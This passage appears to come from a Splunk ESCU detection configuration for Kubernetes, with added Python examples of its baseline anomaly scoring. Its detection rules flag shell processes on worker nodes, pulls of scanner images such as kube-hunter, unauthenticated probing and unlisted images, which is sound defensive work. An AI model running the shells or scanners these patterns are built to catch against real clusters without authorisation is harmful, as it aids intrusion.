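def detect(samples, baseline=BASELINE, min_buckets=MIN_ANOMALOUS_BUCKETS):
    """Processes with at least min_buckets anomalous buckets: key -> count and anomaly strings."""
    per_key = defaultdict(lambda: {"count": 0, "anomalies": set()})
    for (key, _bucket), metrics in bucket_averages(samples).items():
        hits = score_bucket(key, metrics, baseline)
        if hits:
            per_key[key]["count"] += 1
            per_key[key]["anomalies"].update(hits)
    return {k: v for k, v in per_key.items() if v["count"] >= min_buckets}


def constructed_samples():
    """Two minutes of made-up samples: nginx steady, python3 spiking CPU for 80s, curl unbaselined."""
    samples, base_ts = [], 1_713_390_000
    for i in range(12):
        ts = base_ts + i * BUCKET_SECONDS
        samples.append((ts, "prod", "node-a", "nginx", "process.cpu.utilization", 0.06))
        samples.append((ts, "prod", "node-a", "nginx", "process.memory.utilization", 1.25))
        samples.append((ts, "prod", "node-a", "python3", "process.cpu.utilization", 0.9 if i < 8 else 0.11))
        samples.append((ts, "prod", "node-a", "python3", "process.memory.utilization", 2.1))
        samples.append((ts, "prod", "node-a", "curl", "process.cpu.utilization", 0.99))
    return samples


if __name__ == "__main__":
    for key, result in detect(constructed_samples()).items():
        print(key, result["count"], sorted(result["anomalies"]))
```

Only python3 is reported (8 anomalous buckets, CPU 16 standard deviations above its baseline); nginx stays within 4 sigma and curl has no baseline. The constant 4 and the bucket count are the two knobs that trade false positives for detection latency: with 10-second buckets, `count > 5` means a sustained spike of about a minute inside the 70-minute dispatch window.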
This analytic detects anomalous changes in the ratio between specific process resources on a Kubernetes node, based on the past behavior for each process running in the Kubernetes scope on that node. This detection leverages process metrics harvested using an OTEL collector and hostmetrics receiver, and is pulled from Splunk Observability cloud using the Splunk Infrastructure Monitoring Add-on. (https://splunkbase.splunk.com/app/5247). This detection also leverages a lookup table that contains average and standard deviation for the cpu:disk operations, cpu:mem, cpu:thread count, disk operations:thread count, and mem:disk operations ratios. This is used to indicate an anomalous change in resource ratios that indicates the workload has changed behavior irrespective of load. Changes in the relationship between utilization of different resources can indicate a change in behavior of the monitored process, which can indicate a potentially compromised application. Deviations in resource ratios, such as memory-to-CPU or CPU-to-disk utilization, may signify compromised processes, malicious activity, or misconfigurations that could pose risks. A change in process behavior could signify a potential security breach within the Kubernetes environment, where an attacker may have compromised a process either on the node or running within a container. action.escu.mappings = {"cis20": ["CIS 13"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1204"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This analytic detects anomalous changes in the ratio between specific process resources on a Kubernetes node, based on the past behavior for each process running in the Kubernetes scope on that node. This detection leverages process metrics harvested using an OTEL collector and hostmetrics receiver, and is pulled from Splunk Observability cloud using the Splunk Infrastructure Monitoring Add-on. (https://splunkbase.splunk.com/app/5247).
This detection also leverages a lookup table that contains the average and standard deviation for the cpu:disk operations, cpu:mem, cpu:thread count, disk operations:thread count, and mem:disk operations ratios. These are used to flag an anomalous change in resource ratios, which indicates the workload has changed behavior irrespective of load. Changes in the relationship between utilization of different resources can indicate a change in behavior of the monitored process, which can indicate a potentially compromised application. Deviations in resource ratios, such as memory-to-CPU or CPU-to-disk utilization, may signify compromised processes, malicious activity, or misconfigurations that could pose risks. A change in process behavior could signify a potential security breach within the Kubernetes environment, where an attacker may have compromised a process either on the node or running within a container. action.escu.how_to_implement = To implement this detection, follow these steps: \ * Deploy the OpenTelemetry Collector (OTEL) to your Kubernetes cluster.\ * Enable the hostmetrics/process receiver in the OTEL configuration.\ * Ensure that the process metrics, specifically process.cpu.utilization and process.memory.utilization, are enabled; this search also divides by process.disk.operations and process.threads, so those must be collected as well.\ * Install the Splunk Infrastructure Monitoring (SIM) add-on. (ref: https://splunkbase.splunk.com/app/5247)\ * Configure the SIM add-on with your Observability Cloud Organization ID and Access Token.\ * Set up the SIM modular input to ingest Process Metrics.
Name this input "sim_process_metrics_to_metrics_index".\ * In the SIM configuration, set the Organization ID to your Observability Cloud Organization ID.\ * Set the Signal Flow Program to the following: data('process.threads').publish(label='A'); data('process.cpu.utilization').publish(label='B'); data('process.cpu.time').publish(label='C'); data('process.disk.io').publish(label='D'); data('process.memory.usage').publish(label='E'); data('process.memory.virtual').publish(label='F'); data('process.memory.utilization').publish(label='G'); data('process.cpu.utilization').publish(label='H'); data('process.disk.operations').publish(label='I'); data('process.handles').publish(label='J'); data('process.threads').publish(label='K')\ * Set the Metric Resolution to 10000.\ * Leave all other settings at their default values.\ * Run the Search Baseline Of Kubernetes Container Network IO Ratio action.escu.known_false_positives = unknown action.escu.creation_date = 2023-12-18 action.escu.modification_date = 2023-12-18 action.escu.confidence = high action.escu.full_search_name = ESCU - Kubernetes Process with Resource Ratio Anomalies - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Kubernetes"] action.escu.analytic_story = ["Abnormal Kubernetes Behavior using Splunk Infrastructure Monitoring"] action.risk = 1 action.risk.param._risk_message = Kubernetes Process with Resource Ratio Anomalies on host $host$ action.risk.param._risk = [{"risk_object_field": "host", "risk_object_type": "other", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Experimental - Kubernetes Process with Resource Ratio Anomalies - Rule action.correlationsearch.annotations = {"analytic_story": 
["Abnormal Kubernetes Behavior using Splunk Infrastructure Monitoring"], "cis20": ["CIS 13"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1204"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | mstats avg(process.*) as process.* where `kubernetes_metrics` by host.name k8s.cluster.name k8s.node.name process.executable.name span=10s | eval cpu:mem = 'process.cpu.utilization'/'process.memory.utilization' | eval cpu:disk = 'process.cpu.utilization'/'process.disk.operations' | eval mem:disk = 'process.memory.utilization'/'process.disk.operations' | eval cpu:threads = 'process.cpu.utilization'/'process.threads' | eval disk:threads = 'process.disk.operations'/'process.threads' | eval key = 'k8s.cluster.name' + ":" + 'host.name' + ":" + 'process.executable.name' | lookup k8s_process_resource_ratio_baseline key | fillnull | eval anomalies = "" | foreach stdev_* [ eval anomalies =if( '<>' > ('avg_<>' + 4 * 'stdev_<>'), anomalies + "<> ratio higher than average by " + tostring(round(('<>' - 'avg_<>')/'stdev_<>' ,2)) + " Standard Deviations. <>=" + tostring('<>') + " avg_<>=" + tostring('avg_<>') + " 'stdev_<>'=" + tostring('stdev_<>') + ", " , anomalies) ] | eval anomalies = replace(anomalies, ",\s$", "") | where anomalies!="" | stats count values(anomalies) as anomalies by host.name k8s.cluster.name k8s.node.name process.executable.name | where count > 5 | rename host.name as host | `kubernetes_process_with_resource_ratio_anomalies_filter` [ESCU - Kubernetes Scanner Image Pulling - Rule] action.escu = 0 action.escu.enabled = 1 description = This search uses the Kubernetes logs from Splunk Connect for Kubernetes to detect Kubernetes security scanners.
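The two mstats searches above, the anomalous-resource-utilisation one and the resource-ratio one, share a single test: a field is anomalous when its 10-second average exceeds the lookup's avg_<field> + 4 * stdev_<field>, and a process is reported when that happens in more than five such windows of the hourly run. The Python below is an added example, not ESCU or Splunk code, that reproduces that logic over constructed samples; the BASELINE dict stands in for the k8s_process_resource_ratio_baseline lookup, and every number in it and in the samples is made up.

```python
"""Added example, not ESCU code: the baseline z-score check performed by the
ESCU process-metric searches, run over constructed 10-second samples.  Ratio
and lookup column names (avg_<ratio>, stdev_<ratio>) follow the SPL; the
BASELINE values and the sample rows are made-up numbers."""
from collections import Counter, defaultdict

SIGMA = 4.0       # the searches flag value > avg + 4 * stdev
MIN_WINDOWS = 6   # "where count > 5": anomalous in more than five 10s windows

# Constructed stand-in for the k8s_process_resource_ratio_baseline lookup,
# keyed exactly like the SPL: "<cluster>:<host>:<executable>".
BASELINE = {
    "prod:node-1:nginx": {
        "avg_cpu:mem": 1.0,       "stdev_cpu:mem": 0.2,
        "avg_cpu:disk": 0.05,     "stdev_cpu:disk": 0.01,
        "avg_mem:disk": 0.05,     "stdev_mem:disk": 0.01,
        "avg_cpu:threads": 0.025, "stdev_cpu:threads": 0.005,
        "avg_disk:threads": 0.5,  "stdev_disk:threads": 0.1,
    },
}


def sample(cluster, host, name, cpu, mem, disk, threads):
    """One mstats row: 10s averages of the process.* metrics for a process."""
    return {"k8s.cluster.name": cluster, "host.name": host, "process.executable.name": name,
            "process.cpu.utilization": cpu, "process.memory.utilization": mem,
            "process.disk.operations": disk, "process.threads": threads}


def ratios(row):
    """The five eval'd ratios.  SPL division by zero yields null and the later
    fillnull turns it into 0, so an idle process (0 disk ops) gets ratio 0."""
    def div(a, b):
        return a / b if b else 0.0
    cpu, mem = row["process.cpu.utilization"], row["process.memory.utilization"]
    disk, thr = row["process.disk.operations"], row["process.threads"]
    return {"cpu:mem": div(cpu, mem), "cpu:disk": div(cpu, disk), "mem:disk": div(mem, disk),
            "cpu:threads": div(cpu, thr), "disk:threads": div(disk, thr)}


def anomalies_for(values, base, kind="ratio "):
    """Mirror the foreach stdev_* block: one message per field whose value
    exceeds avg + SIGMA * stdev.  kind="" gives the raw-metric search's wording,
    which applies the same test directly to process.* fields."""
    out = []
    for name, value in values.items():
        avg, stdev = base.get(f"avg_{name}"), base.get(f"stdev_{name}")
        if avg is None or not stdev:
            continue  # no usable baseline column for this field: no verdict
        if value > avg + SIGMA * stdev:
            out.append(f"{name} {kind}higher than average by "
                       f"{(value - avg) / stdev:.2f} Standard Deviations")
    return out


def detect(rows, baseline=BASELINE, min_windows=MIN_WINDOWS):
    """stats count values(anomalies) by key | where count > 5, over the rows of
    one search run.  Returns {key: sorted anomaly messages} for flagged keys."""
    windows, msgs = Counter(), defaultdict(set)
    for row in rows:
        key = f"{row['k8s.cluster.name']}:{row['host.name']}:{row['process.executable.name']}"
        if key not in baseline:
            continue  # never baselined: no score (see the note below the block)
        hits = anomalies_for(ratios(row), baseline[key])
        if hits:
            windows[key] += 1
            msgs[key].update(hits)
    return {k: sorted(msgs[k]) for k, n in windows.items() if n >= min_windows}


# Constructed run: nginx behaves normally for eight windows, then CPU rises
# ninefold while memory, disk and thread count stay flat, shifting the ratios.
NORMAL = [sample("prod", "node-1", "nginx", 0.10, 0.10, 2.0, 4) for _ in range(8)]
SHIFTED = [sample("prod", "node-1", "nginx", 0.90, 0.10, 2.0, 4) for _ in range(8)]

if __name__ == "__main__":
    for key, found in detect(NORMAL + SHIFTED).items():
        print(key, *found, sep="\n  ")
```

`detect` skips processes that have no baseline row. The SPL does not: its `fillnull` sets a missing `avg_*`/`stdev_*` to 0, so `'<>' > ('avg_<>' + 4 * 'stdev_<>')` holds for any non-zero value while the z-score term divides by zero. Run the baseline search before enabling either detection and do not expect a usable verdict for a workload it has never seen. Also note that `count > 5` counts 10-second windows anywhere in the run, not consecutive ones.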
action.escu.mappings = {"cis20": ["CIS 13"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1526"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = This search uses the Kubernetes logs from Splunk Connect for Kubernetes to detect Kubernetes security scanners. action.escu.how_to_implement = You must ingest Kubernetes logs through Splunk Connect for Kubernetes. action.escu.known_false_positives = unknown action.escu.creation_date = 2021-08-24 action.escu.modification_date = 2021-08-24 action.escu.confidence = high action.escu.full_search_name = ESCU - Kubernetes Scanner Image Pulling - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Kubernetes"] action.escu.analytic_story = ["Dev Sec Ops"] action.risk = 1 action.risk.param._risk_message = Kubernetes Scanner image pulled on host $host$ action.risk.param._risk = [{"risk_object_field": "host", "risk_object_type": "other", "risk_score": 81}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Kubernetes Scanner Image Pulling - Rule action.correlationsearch.annotations = {"analytic_story": ["Dev Sec Ops"], "cis20": ["CIS 13"], "confidence": 90, "impact": 90, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1526"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search uses the Kubernetes logs from Splunk Connect for Kubernetes to detect Kubernetes security scanners.
action.notable.param.rule_title = Kubernetes Scanner Image Pulling action.notable.param.security_domain = network action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `kube_objects_events` object.message IN ("Pulling image *kube-hunter*", "Pulling image *kube-bench*", "Pulling image *kube-recon*") | rename object.* AS * | rename involvedObject.* AS * | rename source.host AS host | eval phase="operate" | eval severity="high" | stats min(_time) as firstTime max(_time) as lastTime count by host, name, namespace, kind, reason, message, phase, severity | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `kubernetes_scanner_image_pulling_filter` [ESCU - Kubernetes Scanning by Unauthenticated IP Address - Rule] action.escu = 0 action.escu.enabled = 1 description = This detection rule is designed to identify potential scanning activities within a Kubernetes environment. Scanning is a common preliminary step in an attack, where the attacker tries to gather information about the system to find potential vulnerabilities. In the context of Kubernetes, scanning could involve activities like unauthorized access attempts, probing public APIs, or trying to exploit known vulnerabilities. This rule alerts when more than five requests from one source IP by an unauthenticated principal (user group system:unauthenticated) are rejected by the API server with HTTP 403 within the search window, helping to ensure the security of your Kubernetes infrastructure. action.escu.mappings = {"cis20": ["CIS 13"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1046"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This detection rule is designed to identify potential scanning activities within a Kubernetes environment. Scanning is a common preliminary step in an attack, where the attacker tries to gather information about the system to find potential vulnerabilities.
In the context of Kubernetes, scanning could involve activities like unauthorized access attempts, probing public APIs, or trying to exploit known vulnerabilities. This rule alerts when more than five requests from one source IP by an unauthenticated principal (user group system:unauthenticated) are rejected by the API server with HTTP 403 within the search window, helping to ensure the security of your Kubernetes infrastructure. action.escu.how_to_implement = You must ingest Kubernetes audit logs. action.escu.known_false_positives = unknown action.escu.creation_date = 2023-12-07 action.escu.modification_date = 2023-12-07 action.escu.confidence = high action.escu.full_search_name = ESCU - Kubernetes Scanning by Unauthenticated IP Address - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Kubernetes"] action.escu.analytic_story = ["Kubernetes Security"] action.risk = 1 action.risk.param._risk_message = Kubernetes scanning from ip $src_ip$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "other", "risk_score": 49}, {"threat_object_field": "src_ip", "threat_object_type": "ip_address"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Kubernetes Scanning by Unauthenticated IP Address - Rule action.correlationsearch.annotations = {"analytic_story": ["Kubernetes Security"], "cis20": ["CIS 13"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1046"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `kube_audit` "user.groups{}"="system:unauthenticated" "responseStatus.code"=403 | iplocation sourceIPs{} | stats count values(userAgent) as userAgent
values(user.username) as user.username values(user.groups{}) as user.groups{} values(verb) as verb values(requestURI) as requestURI values(responseStatus.code) as responseStatus.code values(responseStatus.message) as responseStatus.message values(responseStatus.reason) as responseStatus.reason values(responseStatus.status) as responseStatus.status by sourceIPs{} Country City | where count > 5 | rename sourceIPs{} as src_ip, user.username as user | `kubernetes_scanning_by_unauthenticated_ip_address_filter` [ESCU - Kubernetes Shell Running on Worker Node - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. This analytic identifies shell activity within the Kubernetes privilege scope on a worker node, returning a list of shell processes regardless of CPU resource consumption. It uses process metrics from an OTEL collector hostmetrics receiver, pulled from Splunk Observability cloud via the Splunk Infrastructure Monitoring Add-on. Metrics used are process.cpu.utilization and process.memory.utilization. Shell processes can indicate unauthorized or suspicious activity, posing a security threat. Shell access to worker nodes can provide attackers an entry point to compromise the node and the entire Kubernetes cluster. Monitoring and detecting shell processes is crucial for anomaly identification, security policy enforcement, and breach mitigation. Unauthorized shell processes on a Kubernetes worker node can severely compromise the cluster's security and integrity. Such access can lead to data theft, service disruption, privilege escalation, lateral movement, and further attacks within the cluster. 
It may also enable attackers to manipulate configurations, deploy malicious containers, and execute arbitrary code, posing a severe risk to the confidentiality, availability, and integrity of applications and sensitive data. action.escu.mappings = {"cis20": ["CIS 13"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1204"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This analytic identifies shell activity within the Kubernetes privilege scope on a worker node, returning a list of shell processes regardless of CPU resource consumption. It uses process metrics from an OTEL collector hostmetrics receiver, pulled from Splunk Observability cloud via the Splunk Infrastructure Monitoring Add-on. Metrics used are process.cpu.utilization and process.memory.utilization. Shell processes can indicate unauthorized or suspicious activity, posing a security threat. Shell access to worker nodes can provide attackers an entry point to compromise the node and the entire Kubernetes cluster. Monitoring and detecting shell processes is crucial for anomaly identification, security policy enforcement, and breach mitigation. Unauthorized shell processes on a Kubernetes worker node can severely compromise the cluster's security and integrity. Such access can lead to data theft, service disruption, privilege escalation, lateral movement, and further attacks within the cluster. It may also enable attackers to manipulate configurations, deploy malicious containers, and execute arbitrary code, posing a severe risk to the confidentiality, availability, and integrity of applications and sensitive data. 
action.escu.how_to_implement = To implement this detection, follow these steps: \ * Deploy the OpenTelemetry Collector (OTEL) to your Kubernetes cluster.\ * Enable the hostmetrics/process receiver in the OTEL configuration.\ * Ensure that the process metrics, specifically process.cpu.utilization and process.memory.utilization, are enabled.\ * Install the Splunk Infrastructure Monitoring (SIM) add-on. (ref: https://splunkbase.splunk.com/app/5247)\ * Configure the SIM add-on with your Observability Cloud Organization ID and Access Token.\ * Set up the SIM modular input to ingest Process Metrics. Name this input "sim_process_metrics_to_metrics_index".\ * In the SIM configuration, set the Organization ID to your Observability Cloud Organization ID.\ * Set the Signal Flow Program to the following: data('process.threads').publish(label='A'); data('process.cpu.utilization').publish(label='B'); data('process.cpu.time').publish(label='C'); data('process.disk.io').publish(label='D'); data('process.memory.usage').publish(label='E'); data('process.memory.virtual').publish(label='F'); data('process.memory.utilization').publish(label='G'); data('process.cpu.utilization').publish(label='H'); data('process.disk.operations').publish(label='I'); data('process.handles').publish(label='J'); data('process.threads').publish(label='K')\ * Set the Metric Resolution to 10000.\ * Leave all other settings at their default values.\ * Run the Search Baseline Of Kubernetes Container Network IO Ratio action.escu.known_false_positives = unknown action.escu.creation_date = 2023-12-18 action.escu.modification_date = 2023-12-18 action.escu.confidence = high action.escu.full_search_name = ESCU - Kubernetes Shell Running on Worker Node - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Kubernetes"] action.escu.analytic_story = ["Abnormal Kubernetes Behavior using Splunk
Infrastructure Monitoring"] action.risk = 1 action.risk.param._risk_message = Kubernetes shell running on worker node on host $host$ action.risk.param._risk = [{"risk_object_field": "host", "risk_object_type": "other", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Experimental - Kubernetes Shell Running on Worker Node - Rule action.correlationsearch.annotations = {"analytic_story": ["Abnormal Kubernetes Behavior using Splunk Infrastructure Monitoring"], "cis20": ["CIS 13"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1204"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | mstats avg(process.cpu.utilization) as process.cpu.utilization avg(process.memory.utilization) as process.memory.utilization where `kubernetes_metrics` AND process.executable.name IN ("sh","bash","csh", "tcsh") by host.name k8s.cluster.name k8s.node.name process.pid process.executable.name span=10s | search process.cpu.utilization>0 OR process.memory.utilization>0 | stats avg(process.cpu.utilization) as process.cpu.utilization avg(process.memory.utilization) as process.memory.utilization by host.name k8s.cluster.name k8s.node.name process.pid process.executable.name | rename host.name as host | `kubernetes_shell_running_on_worker_node_filter` [ESCU - Kubernetes Shell Running on Worker Node with CPU Activity - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. 
This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. This analytic identifies shell activity within the Kubernetes privilege scope on a worker node. It returns shell processes only if they're consuming CPU resources. The detection uses process metrics from an OTEL collector hostmetrics receiver, pulled from Splunk Observability cloud via the Splunk Infrastructure Monitoring Add-on. The metrics used are process.cpu.utilization and process.memory.utilization. Shell processes can indicate unauthorized activity, posing a security threat. Attackers could compromise the node and the entire Kubernetes cluster via shell access to worker nodes. Monitoring shell processes is crucial for anomaly detection, policy enforcement, and breach mitigation. Unauthorized shell processes on a Kubernetes worker node could severely impact the cluster's security and integrity. Attackers could gain full control over the host's resources and file system, compromising all hosted workloads and data. This access could lead to data theft, service disruption, privilege escalation, lateral movement, and further attacks within the cluster. Attackers could also manipulate configurations, deploy malicious containers, and execute arbitrary code, severely risking the confidentiality, availability, and integrity of applications and sensitive data. A rapid and comprehensive incident response is required to mitigate and recover from such a breach. action.escu.mappings = {"cis20": ["CIS 13"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1204"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This analytic identifies shell activity within the Kubernetes privilege scope on a worker node. It returns shell processes only if they're consuming CPU resources. 
The detection uses process metrics from an OTEL collector hostmetrics receiver, pulled from Splunk Observability cloud via the Splunk Infrastructure Monitoring Add-on. The metrics used are process.cpu.utilization and process.memory.utilization. Shell processes can indicate unauthorized activity, posing a security threat. Attackers could compromise the node and the entire Kubernetes cluster via shell access to worker nodes. Monitoring shell processes is crucial for anomaly detection, policy enforcement, and breach mitigation. Unauthorized shell processes on a Kubernetes worker node could severely impact the cluster's security and integrity. Attackers could gain full control over the host's resources and file system, compromising all hosted workloads and data. This access could lead to data theft, service disruption, privilege escalation, lateral movement, and further attacks within the cluster. Attackers could also manipulate configurations, deploy malicious containers, and execute arbitrary code, severely risking the confidentiality, availability, and integrity of applications and sensitive data. A rapid and comprehensive incident response is required to mitigate and recover from such a breach. action.escu.how_to_implement = To implement this detection, follow these steps: \ * Deploy the OpenTelemetry Collector (OTEL) to your Kubernetes cluster.\ * Enable the hostmetrics/process receiver in the OTEL configuration.\ * Ensure that the process metrics, specifically process.cpu.utilization and process.memory.utilization, are enabled.\ * Install the Splunk Infrastructure Monitoring (SIM) add-on. (ref: https://splunkbase.splunk.com/app/5247)\ * Configure the SIM add-on with your Observability Cloud Organization ID and Access Token.\ * Set up the SIM modular input to ingest Process Metrics.
Name this input "sim_process_metrics_to_metrics_index".\ * In the SIM configuration, set the Organization ID to your Observability Cloud Organization ID.\ * Set the Signal Flow Program to the following: data('process.threads').publish(label='A'); data('process.cpu.utilization').publish(label='B'); data('process.cpu.time').publish(label='C'); data('process.disk.io').publish(label='D'); data('process.memory.usage').publish(label='E'); data('process.memory.virtual').publish(label='F'); data('process.memory.utilization').publish(label='G'); data('process.cpu.utilization').publish(label='H'); data('process.disk.operations').publish(label='I'); data('process.handles').publish(label='J'); data('process.threads').publish(label='K')\ * Set the Metric Resolution to 10000.\ * Leave all other settings at their default values.\ * Run the Search Baseline Of Kubernetes Container Network IO Ratio action.escu.known_false_positives = unknown action.escu.creation_date = 2023-12-18 action.escu.modification_date = 2023-12-18 action.escu.confidence = high action.escu.full_search_name = ESCU - Kubernetes Shell Running on Worker Node with CPU Activity - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Kubernetes"] action.escu.analytic_story = ["Abnormal Kubernetes Behavior using Splunk Infrastructure Monitoring"] action.risk = 1 action.risk.param._risk_message = Kubernetes shell with cpu activity running on worker node on host $host$ action.risk.param._risk = [{"risk_object_field": "host", "risk_object_type": "other", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Experimental - Kubernetes Shell Running on Worker Node with CPU Activity - Rule 
action.correlationsearch.annotations = {"analytic_story": ["Abnormal Kubernetes Behavior using Splunk Infrastructure Monitoring"], "cis20": ["CIS 13"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1204"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | mstats avg(process.cpu.utilization) as process.cpu.utilization avg(process.memory.utilization) as process.memory.utilization where `kubernetes_metrics` AND process.executable.name IN ("sh","bash","csh", "tcsh") by host.name k8s.cluster.name k8s.node.name process.pid process.executable.name span=10s | search process.cpu.utilization>0 | stats avg(process.cpu.utilization) as process.cpu.utilization avg(process.memory.utilization) as process.memory.utilization by host.name k8s.cluster.name k8s.node.name process.pid process.executable.name | rename host.name as host | `kubernetes_shell_running_on_worker_node_with_cpu_activity_filter` [ESCU - Kubernetes Suspicious Image Pulling - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic detects instances of suspicious image pulling in Kubernetes. It identifies this behavior by monitoring Kubernetes audit logs for image pull requests that do not match a predefined list of allowed images. This behavior is worth identifying for a SOC as it could indicate an attacker attempting to deploy malicious software or infiltrate the system. The impact of such an attack could be severe, potentially leading to unauthorized access to sensitive systems or data. action.escu.mappings = {"cis20": ["CIS 13"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1526"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = The following analytic detects instances of suspicious image pulling in Kubernetes. 
It identifies this behavior by monitoring Kubernetes audit logs for image pull requests that do not match a predefined list of allowed images. This behavior is worth identifying for a SOC as it could indicate an attacker attempting to deploy malicious software or infiltrate the system. The impact of such an attack could be severe, potentially leading to unauthorized access to sensitive systems or data. action.escu.how_to_implement = The detection is based on data that originates from Kubernetes Audit logs. Ensure that audit logging is enabled in your Kubernetes cluster. Kubernetes audit logs provide a record of the requests made to the Kubernetes API server, which is crucial for monitoring and detecting suspicious activities. Configure the audit policy in Kubernetes to determine what kind of activities are logged. This is done by creating an Audit Policy and providing it to the API server. Because this search matches on requestObject.message, the policy must log the events resource at level Request or RequestResponse; at the Metadata level the request body, and with it the "Pulling image" message, is not recorded. Use the Splunk OpenTelemetry Collector for Kubernetes to collect the logs. This doc describes how to collect the audit log file: https://github.com/signalfx/splunk-otel-collector-chart/blob/main/docs/migration-from-sck.md.
action.escu.known_false_positives = unknown action.escu.creation_date = 2023-12-07 action.escu.modification_date = 2023-12-07 action.escu.confidence = high action.escu.full_search_name = ESCU - Kubernetes Suspicious Image Pulling - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Kubernetes"] action.escu.analytic_story = ["Kubernetes Security"] action.risk = 1 action.risk.param._risk_message = Suspicious image $objectRef.name$ pulled in Kubernetes from ip $src_ip$ by user $user$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "other", "risk_score": 49}, {"threat_object_field": "src_ip", "threat_object_type": "ip_address"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Kubernetes Suspicious Image Pulling - Rule action.correlationsearch.annotations = {"analytic_story": ["Kubernetes Security"], "cis20": ["CIS 13"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1526"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `kube_audit` requestObject.message="Pulling image*" | search NOT `kube_allowed_images` | fillnull | stats count by objectRef.name objectRef.namespace objectRef.resource requestReceivedTimestamp requestURI responseStatus.code sourceIPs{} stage user.groups{} user.uid user.username userAgent verb | rename sourceIPs{} as src_ip, user.username as user | `kubernetes_suspicious_image_pulling_filter` [ESCU - Kubernetes Unauthorized Access - Rule] action.escu = 0 action.escu.enabled = 1 description = The following 
